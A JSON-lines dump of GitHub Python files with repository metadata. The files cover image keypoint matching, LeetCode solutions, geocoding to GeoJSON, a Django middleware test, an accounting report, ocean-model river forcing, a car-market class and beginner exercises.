detected\n pixel positions to obtain desired result\n -------------------------------------------------\n _loc : Points detected after template matching\n\n _kp1 : Keypoint coordinates after feature matching\n -------------------------------------------------\n refined : Final coordinates\n\n refined_keys : Final key point coordinates\n \"\"\"\n\n points_list = []\n key_points = []\n _tol = 50\n\n for pts in zip(*_loc[::-1]):\n for pt1 in _kp1:\n if np.abs(pt1[0] - pts[0]) < _tol and np.abs(pt1[1] - pts[1] < _tol):\n points_list.append(pts)\n key_points.append(pt1)\n\n print(len(points_list))\n\n refined = []\n refined_key = []\n _tol = 5\n for ptr2 in range(0, len(points_list) - 1, 1):\n p1 = points_list[ptr2]\n p2 = points_list[ptr2 + 1]\n if len(refined) == 0:\n refined.append(p1)\n refined_key.append(key_points[ptr2])\n if np.abs(p2[0] - p1[0]) > _tol and np.abs(p2[1] - p1[1]) > _tol:\n # print(\"ptr1:\", p1)\n # print(\"ptr2:\", p2)\n if ptr2 not in refined:\n refined.append(p2)\n refined_key.append(key_points[ptr2+1])\n\n return refined, refined_key\n","repo_name":"urvang96/Ground-Control-Point-Detector","sub_path":"GCPfunctionDefinations.py","file_name":"GCPfunctionDefinations.py","file_ext":"py","file_size_in_byte":5390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"73518254817","text":"from typing import List\n\nclass Solution:\n def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\n rows, cols = len(matrix), len(matrix[0])\n f, t = 0, rows*cols-1\n while f <= t:\n m = (f+t)//2\n num = matrix[m//cols][m%cols]\n if num == target:\n return True\n elif target < num:\n t = m - 1\n else:\n f = m + 1\n return False\n","repo_name":"danzay42/SandBox","sub_path":"python/algorithms/leetcode/search_2d_matrix.py","file_name":"search_2d_matrix.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"19857489207","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# version: 1.0\n# licence : gpl-3.0 or superior\n# author: JDev\n# email: gaetan.bruel@jdev.fr\n# date: 29/01/2020\n# description : a geocoder according to this data https://docs.google.com/spreadsheets/d/1yZv9w9zRKwrGTaR-YzmAqMefw4wMlaXocejdxZaTs6w \n\nfrom os import listdir, getcwd\nfrom os.path import isfile, join\nimport csv, json\nfrom geopy.geocoders import Nominatim\nfrom config import *\nimport urllib.request\n\nPATH = getcwd() + DATAPATH\nn = 1 \n\n##\n# use geocoder to get XY fro address\n# #\ndef geocode(address):\n geocoder = Nominatim()\n # geocode\n location = geocoder.geocode(address, True, 30)\n return location\n\n##\n# create simple geojson base\n# #\ndef createJson():\n json = {}\n json['type'] = 'FeatureCollection'\n json['features'] = []\n return json\n\n##\n# create json properties from feature infos\n# #\ndef locationToJson(line, location, colNames):\n i = 0\n properties = {}\n # geom\n geometry = {\n 'type':'Point',\n 'coordinates': [location.longitude, location.latitude]\n }\n\n # get properties from col\n for col in colNames: \n # save props\n properties[col] = line[i]\n # join json\n i+=1\n feature = {\n 'type': 'Feature',\n 'geometry': geometry,\n 'properties': properties\n }\n return feature\n\n##\n# from line, get location\n# #\ndef getLocation(line) :\n # clean adress\n adresse = ''\n if line[0] and line[1]:\n adresse = line[0] + \", \" + line[1]\n elif line[1]:\n adresse = line[1]\n adresse = adresse.replace('Mainland China', 'China')\n # geocode\n location = geocode(adresse)\n # create feature for json\n return location\n\n##\n# read and convert csv feature to geojson\n# #\ndef csvToJson(fPath, delimiter):\n inputFile = open(fPath, 'rt') \n inputData = csv.reader(inputFile, delimiter = delimiter)\n outputData = csv.writer(outputFile, delimiter = ',', lineterminator = '\\n')\n colNames = next(inputData)\n for line in inputData:\n location = getLocation(line)\n feature = locationToJson(line, location, colNames)\n outJson['features'].append(feature)\n\noutJson = createJson()\n\n# parse files from dir\nfor f in listdir(PATH):\n if isfile(join(PATH,f)):\n print('READ FILE' + str(n) + '>>>>')\n try:\n csvToJson(join(PATH,f),';')\n except Exception as inst:\n print(inst)\n n = n + 1\n\n# parse file from web\nprint('GET CSV FROM WEB >>>>')\nurllib.request.urlretrieve(URL, INPUTFILE)\nprint('GEOCODE FILE >>>>')\ncsvToJson(INPUTFILE, ',')\n\n# export json to file\nwith open(OUTPUTJSON, 'w') as outfile:\n json.dump(outJson, outfile)\n\nprint('END SCRIPT >>>>')","repo_name":"Gaetanbrl/coronageocoder","sub_path":"scripts/createjson.py","file_name":"createjson.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"16796562502","text":"\"\"\"Unit tests for extension middleware.\"\"\"\n\nimport kgb\nfrom django.test import override_settings\n\nfrom djblets.extensions.extension import Extension\nfrom djblets.extensions.testing import ExtensionTestCaseMixin\nfrom djblets.testing.testcases import TestCase\n\n\nMIDDLEWARE = [\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'djblets.extensions.middleware.ExtensionsMiddleware',\n 'djblets.extensions.middleware.ExtensionsMiddlewareRunner',\n]\n\n\nclass Middleware(object):\n def __init__(self, get_response):\n self.get_response = get_response\n\n def __call__(self, request):\n return self.get_response(request)\n\n\nclass MyTestExtension(Extension):\n middleware = [\n 'djblets.extensions.tests.test_middleware.Middleware',\n ]\n\n\nclass MiddlewareTests(kgb.SpyAgency, ExtensionTestCaseMixin, TestCase):\n \"\"\"Unit tests for extension middleware.\"\"\"\n\n @override_settings(MIDDLEWARE=MIDDLEWARE)\n def test_extension_middleware(self):\n \"\"\"Testing extension middleware\"\"\"\n self.spy_on(Middleware.__call__, owner=Middleware)\n self.setup_extension(MyTestExtension)\n self.client.get('/')\n self.assertSpyCalled(Middleware.__call__)\n","repo_name":"djblets/djblets","sub_path":"djblets/extensions/tests/test_middleware.py","file_name":"test_middleware.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":314,"dataset":"github-code","pt":"34"} +{"seq_id":"72101764256","text":"from datetime import *\nfrom gather_input import *\n\n# parse input\nstart_time = datetime.now().replace(month=int(date_str[3:]), day=int(date_str[:2]), hour=(int(start_time_str[:2])), minute=int(start_time_str[3:]), second=1)\nend_time = datetime.now().replace(month=int(date_str[3:]), day=int(date_str[:2]), hour=(int(end_time_str[:2])), minute=int(end_time_str[3:]), second=1)\ncurrent_time = start_time\ninterval_duration = timedelta(minutes=interval_duration)\nshort_break_duration = timedelta(minutes=short_break_duration)\nlong_break_duration = timedelta(minutes=long_break_duration)\n\n\n","repo_name":"jakobnunnendorf/Timebloc","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"25519067768","text":"import numpy as np\nimport netCDF4\nimport pyroms\nimport sys\n\nimport read_host_info\nsv = read_host_info.read_host_info()\nin_dir = sv['in_dir']\nout_dir = sv['out_dir']\n\nif len(sys.argv)>1:\n grd1 = sys.argv[-1]\nelse:\n grd1 = 'GB_lr'\n\nmy_year = 2008\ndischarge_depth = 3\ngrd = pyroms.grid.get_ROMS_grid(grd1)\nh = grd.vgrid.h\nCs_r = grd.vgrid.Cs_r\n\ntag = 'Hill'\nout_file = out_dir + 'frc/' + grd.name + '_rivers_' + str(my_year) + '_' + tag + '.nc'\n\n# Set the vertical distribution of the river transport.\n\nfh = netCDF4.Dataset(out_file, 'a', format='NETCDF3_64BIT')\nN = len(fh.dimensions['s_rho'])\nNr = len(fh.dimensions['river'])\neta = fh.variables['river_Eposition'][:]\nxi = fh.variables['river_Xposition'][:]\nsign = fh.variables['river_sign'][:]\ndirection = fh.variables['river_direction'][:]\n\nhh = np.zeros(Nr)\nfor i in range(Nr):\n if sign[i] == 1:\n hh[i] = h[eta[i], xi[i]]\n else:\n if direction[i] == 0:\n hh[i] = h[eta[i], xi[i]-1]\n else:\n hh[i] = h[eta[i]-1, xi[i]]\n\nvshape = np.zeros((N, Nr))\nfor i in range(Nr):\n z = -Cs_r*hh[i]\n msk = z <= discharge_depth\n weight = np.arange(sum(msk))\n vshape[msk, i] = weight\n vshape[:, i] = vshape[:, i]/sum(vshape[:, i])\n\nfh.variables['river_Vshape'][:] = vshape\nfh.close()\n","repo_name":"ChuningWang/gb_roms","sub_path":"make_rivers/obsolete/set_vshape.py","file_name":"set_vshape.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"70855844259","text":"# How do you reverse a given string in place? \nstr = 'How do you reverse a given string in place?'\nstr = str[::-1]\nprint(str)\n\n#2: Reversed\nstr = 'How do you reverse a given string in place?'\nstr = \"\".join(list(reversed(str)))\nprint(str)\n\n#3: Using while loop\nstr = 'How do you reverse a given string in place?'\ntemp_str = ''\nindex = len(str) - 1\nwhile(index >= 0):\n temp_str = temp_str + str[index]\n index -= 1\nprint(temp_str)\n\n# Reverse the order of words in a string\nstr = 'Reverse the order of words in a string'\nprint(\" \".join(str.split()[::-1]))\n\n# Reverse internal content of each word\nstring = 'Reverse internal content of each word'\nprint(\" \".join(list(map(lambda x: x[::-1], string.split(\" \")))))\n\nstring = 'REVERSE internal content of every second word present in the given string'\nrev = []\nfor index, word in enumerate(string.split(\" \")):\n if (index%2 == 0):\n pass\n else: \n rev.append(word[::-1])\nprint(\" \".join(rev))\n\n\n# Program for the requirement,input: a4z2b3c2 and expected output: aaaabbbcczz(sorted)\na = \"a4z2b3c2\"\nres = []\nfor pos in range(0, len(a), 2):\n char = a[pos:pos+2][0]\n rep = a[pos:pos+2][1]\n res.append(char * int(rep))\nprint(\"\".join(list(sorted(res))))\n\n#Program for the requirement,input: aaaabbbccz and expected output: 4a3b2c1z\nimport collections\nresults = collections.Counter('aaaabbbccz')\nfor key,value in results.items():\n print(\"{}{}\".format(value,key), end=\"\")\n\n# Check if two stings are anagrams\n# An anagram is a word or phrase formed by rearranging the letters of a different word or phrase, typically using all the original letters exactly once.\na = \"abcde\"\nb = \"edcabbbb\"\n\nif ((\"\".join(sorted(a))) == (\"\".join(sorted(b)))):\n print(\"\\n{} & {} are anagrams\".format(a, b))\nelse :\n print(\"\\n{} & {} are NOT anagrams\".format(a, b))","repo_name":"soumyazyx/Python","sub_path":"PythonBasics/StringInterviewQAs.py","file_name":"StringInterviewQAs.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"4452585633","text":"class Solution:\n def maxProfit(self, prices: List[int]) -> int:\n \n #Optimal approach\n max_prof = 0\n min_prof = float(\"inf\")\n for i in range(len(prices)):\n min_prof =min(min_prof,prices[i])\n max_prof = max(max_prof , prices[i] - min_prof)\n return max_prof\n\n \n #Bruteforce Approach\n # max_prof = 0 \n # for i in range(len(prices)):\n # curr = 0\n # for j in range(i+1,len(prices)):\n # prof = prices[j] - prices[i]\n # if prof <=0:\n # continue\n # else:\n # max_prof = max(max_prof,prof)\n # return max_prof\n\n\n\n\n\n","repo_name":"Madhukar-R12/LeetCode","sub_path":"0121-best-time-to-buy-and-sell-stock/0121-best-time-to-buy-and-sell-stock.py","file_name":"0121-best-time-to-buy-and-sell-stock.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"24642068588","text":"class SlideWindow():\n def __init__(self, frames, window_length, hop_length):\n self.frames = frames\n self.window_length = int(window_length)\n self.hop_length = int(hop_length)\n\n # 迭代对象最简单写法,无需迭代器。index自动从0开始递增\n def __getitem__(self, index):\n sti = index * self.hop_length\n edi = sti + self.window_length\n if edi > len(self.frames):\n raise IndexError()\n return self.frames[sti:edi]\n","repo_name":"asqqwwd/Jamming","sub_path":"utils/iters.py","file_name":"iters.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6867557344","text":"# -*- coding: utf-8 -*-\nfrom collections import defaultdict\nfrom datetime import datetime, timedelta\nfrom decimal import Decimal\nimport urllib\nfrom itertools import tee, izip\nfrom trytond.pool import Pool, PoolMeta\nfrom trytond.protocols.jsonrpc import JSONEncoder, json\nfrom sql.aggregate import Sum\nfrom trytond.transaction import Transaction\n\nfrom openlabs_report_webkit import ReportWebkit\n\n__metaclass__ = PoolMeta\n__all__ = ['AccountMoveLine']\n\n\nclass AccountMoveLine:\n 'Account Move Line'\n __name__ = 'account.move.line'\n\n def origin_details(self):\n \"\"\"\n Returns the origin as a string to print on checks\n \"\"\"\n Model = Pool().get('ir.model')\n\n try:\n self.origin.rec_name\n except AttributeError:\n return None\n\n model, = Model.search([\n ('model', '=', self.origin.__name__)\n ])\n return \"%s, %s\" % (model.name, self.origin.rec_name)\n\n\ndef pairwise(iterable):\n \"s -> (s0,s1), (s1,s2), (s2, s3), ...\"\n a, b = tee(iterable)\n next(b, None)\n return izip(a, b)\n\n\nclass AgedBalance(ReportWebkit):\n __name__ = 'account.aged_balance'\n\n @classmethod\n def get_context(cls, objects, data):\n pool = Pool()\n Party = pool.get('party.party')\n MoveLine = pool.get('account.move.line')\n Move = pool.get('account.move')\n Account = pool.get('account.account')\n Company = pool.get('company.company')\n Date = pool.get('ir.date')\n cursor = Transaction().connection.cursor()\n report_context = super(AgedBalance, cls).get_context(objects, data)\n\n line = MoveLine.__table__()\n move = Move.__table__()\n account = Account.__table__()\n\n company = Company(data['company'])\n report_context['digits'] = company.currency.digits\n report_context['posted'] = data['posted']\n with Transaction().set_context(context=report_context):\n line_query, _ = MoveLine.query_get(line)\n\n def get_current_by_party(today):\n \"\"\"\n Not Due Yet + Without Maturity date\n \"\"\"\n term_query = line.maturity_date == None\n term_query |= line.maturity_date > today\n cursor.execute(\n *line.join(\n move, condition=line.move == move.id\n ).join(\n account, condition=line.account == account.id\n ).select(\n line.party, Sum(line.debit) - Sum(line.credit),\n where=(line.party != None) &\n account.active &\n account.kind.in_(kind) &\n (line.reconciliation == None) &\n (account.company == data['company']) &\n term_query &\n line_query,\n group_by=line.party,\n having=(Sum(line.debit) - Sum(line.credit)) != 0)\n )\n return cursor.fetchall()\n\n def get_balance_by_party(to_date, from_date):\n term_query = line.maturity_date <= to_date\n term_query &= line.maturity_date > from_date\n cursor.execute(\n *line.join(\n move, condition=line.move == move.id\n ).join(\n account, condition=line.account == account.id\n ).select(\n line.party, Sum(line.debit) - Sum(line.credit),\n where=(line.party != None) &\n account.active &\n account.kind.in_(kind) &\n (line.reconciliation == None) &\n (account.company == data['company']) &\n term_query &\n line_query,\n group_by=line.party,\n having=(Sum(line.debit) - Sum(line.credit)) != 0)\n )\n return cursor.fetchall()\n\n terms = (data['term1'], data['term2'], data['term3'])\n if data['unit'] == 'month':\n coef = timedelta(days=30)\n else:\n coef = timedelta(days=1)\n\n today = Date.today()\n dates = [\n today,\n today - data['term1'] * coef, # 0-term1\n today - data['term2'] * coef, # term1-term2\n today - data['term3'] * coef, # term2-term3\n datetime.min, # older\n ]\n\n kind = {\n 'both': ('payable', 'receivable'),\n 'supplier': ('payable',),\n 'customer': ('receivable',),\n }[data['balance_type']]\n\n res = defaultdict(lambda: defaultdict(lambda: Decimal('0')))\n totals = defaultdict(lambda: Decimal('0'))\n for position, date_range in enumerate(pairwise(dates)):\n term = ['term1', 'term2', 'term3', 'older'][position]\n for party, balance in get_balance_by_party(*date_range):\n res[party][term] = balance\n totals[term] += balance\n\n for party, balance in get_current_by_party(today):\n res[party]['current'] = balance\n totals['current'] += balance\n\n for party in Party.browse(res.keys()):\n res[party.id]['total'] = party.receivable + party.payable\n totals['net'] += res[party.id]['total']\n\n def get_balance_url(party, term=None):\n \"Given a party and term number (1-3) or older return URI\"\n path = MoveLine.__url__\n domain = [\n ('reconciliation', '=', None),\n ('party', '=', party.id),\n ('account.kind', 'in', kind),\n ]\n if data['posted']:\n domain.append(('move.state', '=', 'posted'))\n\n if term == 'current':\n domain.append([\n 'OR', [\n ('maturity_date', '>', today),\n ], [\n ('maturity_date', '=', None),\n ],\n ])\n\n elif term is not None:\n # Add the date range\n term_index = 4 if term == 'older' else term\n to_date, from_date = dates[term_index - 1], dates[term_index]\n domain.extend([\n ('maturity_date', '<=', to_date),\n ('maturity_date', '>', from_date),\n ])\n return ';'.join((\n path,\n urllib.urlencode([\n ('domain', json.dumps(domain, cls=JSONEncoder))\n ])\n ))\n\n report_context['parties'] = Party.search([('id', 'in', res.keys())])\n report_context['balances'] = res\n report_context['totals'] = totals\n report_context['kind'] = kind\n report_context['terms'] = terms\n report_context['unit'] = data['unit']\n report_context['currency_code'] = company.currency.code\n report_context['get_balance_url'] = get_balance_url\n\n return report_context\n","repo_name":"trytonus/trytond-report-html-accounts","sub_path":"account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":6996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"27197312997","text":"from collections import Counter\nimport torch\nfrom torchmetrics import Metric\nfrom typing import List\n\n\nclass TWS_WORD_F1(Metric):\n '''Micro F1 Score'''\n\n def __init__(self,\n ignore_index: int = None,\n constraint_type: str = 'BMES',\n dist_sync_on_step=False):\n super().__init__(dist_sync_on_step=dist_sync_on_step)\n self.ignore_index = ignore_index\n if constraint_type.upper() == 'BMES':\n self.constraint_type = constraint_type\n self.ids = dict({0: 'B', 1: 'M', 2: 'E', 3: 'S'})\n else:\n raise NotImplementedError\n\n # (# w_ref ∩ w_hyp)\n self.add_state('correct_preds',\n default=torch.tensor(0),\n dist_reduce_fx='sum')\n # (# w_hyp)\n self.add_state('total_preds',\n default=torch.tensor(0),\n dist_reduce_fx='sum')\n # (# w_ref)\n self.add_state('total_correct',\n default=torch.tensor(0),\n dist_reduce_fx='sum')\n # (# w_ref + # w_hyp)\n self.add_state('total_tokens',\n default=torch.tensor(0),\n dist_reduce_fx='sum')\n\n def __repr__(self):\n rep = 'TWS_WORD_F1(ignore_index=`{}`, constraint_type=`{}`)'.format(\n self.ignore_index, self.constraint_type.upper())\n return rep\n\n def __state__(self):\n return 'correct_preds: {},\\ntotal_preds: {},\\n'.format(\n self.correct_preds,\n self.total_preds) + 'total_correct: {},\\ntotal_tokens: {}'.format(\n self.total_correct, self.total_tokens)\n\n def update(self, preds: List[str], golds: List[str]):\n for _pred, _gold in zip(preds, golds):\n self._update_states(_pred.split(), _gold.split())\n\n def _update_states(self, pred: List, gold: List):\n if len(pred) > len(gold):\n pred, gold = gold, pred\n p_counter = Counter(pred)\n g_counter = Counter(gold)\n\n correct_preds = sum(\n min(p_counter[gk], gv) for gk, gv in g_counter.items())\n total_preds = len(pred)\n total_correct = len(gold)\n total_tokens = (len(gold) + len(pred))\n\n self.correct_preds += correct_preds\n self.total_preds += total_preds\n self.total_correct += total_correct\n self.total_tokens += total_tokens\n\n def compute(self):\n correct_preds = self.correct_preds\n total_preds = self.total_preds\n total_correct = self.total_correct\n\n tp, fp, fn = (correct_preds, total_preds - correct_preds,\n total_correct - correct_preds)\n p = 0.0 if tp + fp == 0 else 1. * tp / (tp + fp)\n r = 0.0 if tp + fn == 0 else 1. * tp / (tp + fn)\n f = 0.0 if p + r == 0 else 2 * p * r / (p + r)\n return f\n","repo_name":"tchayintr/latte-ws","sub_path":"src/utils/word_tws_metrics.py","file_name":"word_tws_metrics.py","file_ext":"py","file_size_in_byte":2893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"70338870177","text":"from __future__ import print_function\nfrom __future__ import division\n\nimport glob\nimport os\nimport argparse\nimport json\n\nimport pandas as pd\nimport numpy as np\nimport getdist\nimport getdist.plots\n\n\ndef main(args):\n\n log_roots = glob.glob(args.root)\n\n if args.dim != 0:\n x_dims = [args.dim]\n else:\n x_dims = range(2, 50)\n\n for log_root in log_roots:\n\n print()\n print('------------------------')\n print(log_root)\n print('------------------------')\n print()\n\n # Find\n log_dim_dirs = [[] for _ in x_dims]\n for ix, x_dim in enumerate(x_dims):\n for log_dir in glob.glob(os.path.join(log_root, 'run*')):\n if os.path.exists(os.path.join(log_dir, 'info', 'params.txt')):\n with open(os.path.join(log_dir, 'info', 'params.txt')) as f:\n data = json.load(f)\n if int(data['x_dim']) == x_dim:\n log_dim_dirs[ix].append(log_dir)\n\n for ix, log_dim_dir in enumerate(log_dim_dirs):\n\n logzs = []\n dlogzs = []\n nlikes = []\n ess = []\n\n if len(log_dim_dir) > 0:\n print()\n print('--------')\n print('Dim: %s' % x_dims[ix])\n print('--------')\n print()\n\n for log_dir in log_dim_dir:\n\n with open(os.path.join(log_dir, 'info', 'params.txt')) as f:\n data = json.load(f)\n\n if os.path.exists(os.path.join(log_dir, 'chains', 'chain.txt')):\n names = ['p%i' % i for i in range(int(data['x_dim']))]\n labels = [r'x_{%i}' % i for i in range(int(data['x_dim']))]\n files = getdist.chains.chainFiles(os.path.join(log_dir, 'chains', 'chain.txt'))\n if data['sampler'] == 'nested':\n mc = getdist.MCSamples(os.path.join(log_dir, 'chains', 'chain.txt'), names=names, labels=labels,\n ignore_rows=0.0, sampler='nested')\n else:\n mc = getdist.MCSamples(os.path.join(log_dir, 'chains', 'chain.txt'), names=names, labels=labels,\n ignore_rows=0.3)\n mc.readChains(files)\n if args.feedback > 0:\n print(mc.getMargeStats())\n\n if args.plot:\n g = getdist.plots.getSubplotPlotter()\n g.triangle_plot(mc, filled=True)\n g.export(os.path.join(os.path.join(log_dir, 'plots', 'triangle.png')))\n\n if data['sampler'] == 'nested':\n if os.path.exists(os.path.join(log_dir, 'results', 'final.csv')):\n results = pd.read_csv(os.path.join(log_dir, 'results', 'final.csv'))\n print(results)\n logzs.append(results['logz'])\n dlogzs.append(results['logzerr'])\n nlikes.append(results['ncall'])\n ess.append(np.sum(mc.weights) ** 2 / np.sum(mc.weights ** 2))\n\n if len(logzs) > 1:\n print()\n print('Num runs: %s' % (len(logzs)))\n print(r'Log Z: $%4.2f \\pm %4.2f$' % (np.mean(logzs), np.std(logzs)))\n print(r'Log Z error estimate: $%4.2f \\pm %4.2f$' % (np.mean(dlogzs), np.std(dlogzs)))\n print(r'N_like: $%.0f \\pm %.0f$' % (np.mean(nlikes), np.std(nlikes)))\n print(r'Posterior ESS: $%.0f \\pm %.0f$' % (np.mean(ess), np.std(ess)))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--root', type=str, default='logs/*')\n parser.add_argument('--dim', type=int, default=0)\n parser.add_argument('--feedback', type=int, default=0)\n parser.add_argument('-plot', action='store_true')\n\n args = parser.parse_args()\n main(args)\n","repo_name":"adammoss/nnest","sub_path":"examples/nested/analyse.py","file_name":"analyse.py","file_ext":"py","file_size_in_byte":4034,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"34"} +{"seq_id":"16240259783","text":"# Buyer-ը կունենա money, spent_money և bought_cars ատրիբուտները։\n# Buyer-ի money-ին կփոխանցեք կամայական արժեք` Buyer օբյեկտի ստեղծման պահին,\n# իսկ spent_money-ը պետք է ունենա 0 սկզբնական արժեք (այս ատրիբուտը ցույց կտա գնորդի ծախսած գումարը)։\n\n# Buyer class-ը պետք է ունենա հետևյալ մեթոդները՝\n# 1. buy - գնելու է վաճառողից մեքենա։ Լինելու է public method\n# 2. return_carr - վերադարձնելու է մեքենան (դրանից բխող բոլոր update-ները պետք է կարատվեն)։ Լինելու է public method\n# 3. change_money - ավելացնելու/պակասացնելու է գումարը։ Լինելու է private method\n# 4. add_bought_cars - ավելացնելու է գնված մեքենան bought_cars֊ում։ Պետք է նշվի մեքենայի մոդելը,\n# վաճառողի անուն/ազգանուն/քաղաք, գործարքի ամիս ամսաթիվը հետևյալ ֆորմատով՝ \"տարի-ամիս֊օր\"\n# 5. print_my_cars - ցույց կտա գնորգի գնված մեքենաները։ Լինելու է public method\nfrom datetime import datetime\n\nfrom carMarket import CarMarket\nfrom person import Person\n\nfrom car import Car\nfrom seller import Seller\n\n\nclass Buyer(Person):\n\n def __init__(self, first_name, last_name, city, money=50000):\n super().__init__(first_name, last_name, city)\n self.money = money\n self.spent_money = 0\n self.bought_cars = {}\n\n def generate_key(self):\n key = 1\n while True:\n if key in list(self.bought_cars.keys()):\n key += 1\n else:\n return key\n\n def buy(self, car: Car, seller: Seller):\n self.add_bought_cars(car, seller)\n self.money -= car.price - car.discount\n self.spent_money += car.price - car.discount\n\n def return_car(self, car: Car):\n self.bought_cars.pop(car)\n self.money += car.price - car.discount\n\n def change_money(self, money):\n self.money += money\n\n def add_bought_cars(self, car, seller: Seller):\n key = self.generate_key()\n self.bought_cars[key] = {\n 'car': car,\n 'date': datetime.now().strftime(\"%d-%B-%Y\"),\n 'seller': {\n 'name': seller.first_name,\n 'lastname': seller.last_name,\n 'city': seller.city\n }\n }\n\n def print_my_cars(self):\n for i in self.bought_cars:\n print(self.bought_cars[i]['car'])\n\n\nif __name__ == '__main__':\n carpark = CarMarket.carpark\n seller_1 = Seller('aram', 'shahbazyan', 'yerevan', carpark)\n car_1 = Car('BMW', 5000, 1000)\n buyer_1 = Buyer('meliq', 'harutyunyan', 'yerevan')\n\n buyer_1.buy(car_1, seller_1)\n buyer_1.print_my_cars()\n print(buyer_1.bought_cars)\n # add_new_car = CarMarket()\n # add_new_car.add_car(car_1, seller_1)\n print(carpark)\n","repo_name":"AramShahbazyan/Car_Market","sub_path":"buyer.py","file_name":"buyer.py","file_ext":"py","file_size_in_byte":3092,"program_lang":"python","lang":"hy","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"25560028275","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def verticalOrder(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[List[int]]\n \"\"\"\n results = collections.defaultdict(list)\n import queue\n queue = queue.Queue()\n queue.put((root, 0))\n while not queue.empty():\n node, x = queue.get()\n if node:\n results[x].append(node.val)\n queue.put((node.left, x - 1))\n queue.put((node.right, x + 1))\n \n return [results[i] for i in sorted(results)]\n\n","repo_name":"jxlxt/leetcode","sub_path":"Python/314.binay_tree_vertical_order_traversal.py","file_name":"314.binay_tree_vertical_order_traversal.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"2790604064","text":"ornek= \"bu gun hava cok guzel\"\n\n#print(ornek.capitalize())\n#print(ornek.upper())\n#print(\"bu gun hava durumu:\"+ ornek)\n#print(\"bu gun hava durumu:{}\".format(ornek))\n#print(\"bu gun hava durum u:\", ozel_sayim, ornek)\n#print(ozel_sayim == None)\n\n\n#meyveler[\"elma\", \"armut\", \"ananas\"]\n\n#print(meyveler.append(\"kiraz\"))\n#print(meyveler)\n#meyveler.insert(1,\"avokado\")\n#ozeşl_sayilar=[10,2,5,21,16]\n#ozel_sayilar.sort()\n\n\n#varsayilan_not = {\"vise\": 0, \"final\": 0}\n#ogrenciler= {\n\n # 'Sezer Bozkir' : {'vise': 80, \"final\": 90}, #tek veya çift tırnak olması durumu değiştirmez ama ikisi aynı olsa iyii olur\n # 'Fatmanur Bilke ':{'vise':60, \"final\": 100}\n#}\n\n#print(ogrenciler.get('Enes Sahin'))\n #if ogrenciler.get('Enes Sahin') == None :\n # ogrenciler.update({'Enes Sahin': varsayilan_not,\n # 'Mustafa Ersoy':varsayilan_not})\n\n #print(ogrenciler.get(\"Yasar Celep\", varsayilan_not))\n\n #print(ogrenciler)\n #print(ogrenciler.items())\n #for ogrenci, notu in ogrenciler.items():\n# ogrenciler[ogrenci]['vise'] = 0\n\n # print(ogrenciler)\n\n #print(ogrenciler)\n\nvize_final_notları = {}\nfor İ in range(5):\n\n ogrenci_ismi = input('ogrenci İsmi : ')\n\nvize_notu= int(input('Vize Notu'))\nfinal_notu = int(input('Final Notu'))\n\n\n\n\n #tekrarrr!!!!\n\n#for(int i=0; i<5; i++)\n\n # for i in range(0.6.1)\n\n # for i in [0,1,2,3,4,5]:\n\n\n\n\n\n\n\n\n\n","repo_name":"agrk/eyl-l","sub_path":"ikinci gün.py","file_name":"ikinci gün.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"11900670951","text":"from pandas import *\nimport os\n\ndf = read_csv('/scratch/rx32940/PATRIC_biosample_assemblies.csv',header = None) # read from csv, assembly as index\n\n#df = df.parse(xls.sheet_names[0], index_col = 1) # parse the first sheet of excel with row name = 1\n\ndf.iloc[:,1] = df.iloc[:,1].str[:13] # substring the version from the assembly accession\ndf.iloc[:,1] = [item.replace(\"GCF\",\"GCA\") for item in df.iloc[:,1]] # replace all refseq accession with genebank acc\nprint(df)\nbiosample_assembly = df.set_index(1)[0].to_dict() # set assembly as index, biosample as point to\n#print(biosample_assembly)\n\n\npath = \"/scratch/rx32940/PATRIC_assemblies_633/ncbi-genomes-2020-01-22/\"\n\nfor f in os.listdir(path):\n assembly = f[0:f.index(\".\")]\n biosample_name = biosample_assembly[assembly]\n os.rename(path+f,path+biosample_name + \".fna.gz\")\n #print(biosample_name)\n\n\n\n","repo_name":"rx32940/Lepto-Phylogeography","sub_path":"Assemblies_code/query_biosample_assembly.py","file_name":"query_biosample_assembly.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9732130141","text":"from mock import 